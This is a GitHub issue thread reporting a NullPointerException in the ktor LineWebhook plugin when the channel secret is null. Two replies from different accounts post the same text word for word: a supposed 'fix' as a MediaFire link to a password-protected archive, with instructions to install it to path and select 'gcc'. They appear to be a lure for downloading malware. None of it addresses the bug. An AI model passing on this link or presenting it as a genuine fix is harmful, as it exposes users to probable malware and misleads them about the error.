### ISSUE TITLE
Missing configuration for LineWebhook plugin

### ISSUE THREAD

**Issue by bjhham** [ktorio/ktor-plugin-registry#131]
```
Exception in thread "main" java.lang.NullPointerException: Parameter specified as non-null is null: method io.github.cotrin8672.Configuration.setChannelSecret, parameter <set-?>
	at io.github.cotrin8672.Configuration.setChannelSecret(LineWebhookSignatureValidation.kt)
	at com.re.ka.ku.plugins.SecurityKt.configureSecurity$lambda$2$lambda$1$lambda$0(Security.kt:15)
	at io.ktor.server.application.CreatePluginUtilsKt.createRouteScopedPluginInstance(CreatePluginUtils.kt:283)
	at io.ktor.server.application.CreatePluginUtilsKt.access$createRouteScopedPluginInstance(CreatePluginUtils.kt:1)
	at io.ktor.server.application.CreatePluginUtilsKt$createRouteScopedPlugin$1.install(CreatePluginUtils.kt:137)
```

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
